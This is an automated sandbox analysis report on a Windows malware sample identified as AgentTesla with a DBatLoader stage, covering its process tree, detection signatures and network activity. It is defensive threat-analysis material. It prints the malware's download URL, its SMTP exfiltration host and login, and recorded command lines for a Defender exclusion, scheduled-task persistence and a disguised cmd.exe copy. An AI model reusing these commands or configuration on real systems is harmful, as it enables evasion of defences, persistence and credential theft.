Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x.exe

Overview

General Information

Sample name:x.exe
Analysis ID:1554496
MD5:31bc6907d6097a76bb1dd891cfc09b7a
SHA1:97340ca203a1207e492135d580c6860a724a227f
SHA256:f711703c8ba66dcedb8e4b83f21a0425c528e278242c852fd5cf54bb43e30454
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • x.exe (PID: 6332 cmdline: "C:\Users\user\Desktop\x.exe" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • cmd.exe (PID: 3380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 5032 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 4864 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lxsyrsiW.pif (PID: 2104 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 2532 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
        • powershell.exe (PID: 3132 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2828 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 5168 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TrojanAIbot.exe (PID: 5388 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
        • cmd.exe (PID: 1268 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3660 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • TrojanAIbot.exe (PID: 6628 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 5032 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • lxsyrsiW.pif (PID: 4208 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 2968 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 1268 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 4948 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • lxsyrsiW.pif (PID: 3088 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 6408 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 3820 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\neworigin.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 15 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                9.0.neworigin.exe.840000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  9.0.neworigin.exe.840000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    9.0.neworigin.exe.840000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.x.exe.2ec0000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\x.exe, ProcessId: 6332, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 6332, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2104, ProcessName: lxsyrsiW.pif
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x.exe, ProcessId: 6332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3132, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x.exe, ProcessId: 6332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 6332, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2104, ProcessName: lxsyrsiW.pif
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3132, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 2532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5168, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 3796, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49714
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5168, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2532, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3132, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-12T15:55:20.344502+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649721TCP
                      2024-11-12T15:55:58.715306+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649888TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-12T15:55:02.088938+010020283713Unknown Traffic192.168.2.649710198.252.105.91443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Found malware configuration
                      Source: x.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
                      Source: 9.0.neworigin.exe.840000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFReversingLabs: Detection: 28%
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 65%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49781 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2187757870.0000000028410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021E90000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111145235.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021EBF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2200179187.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02EC5908
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 013B7394h10_2_013B7108
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 013B78DCh10_2_013B767A
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_013B7E60
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_013B7E54
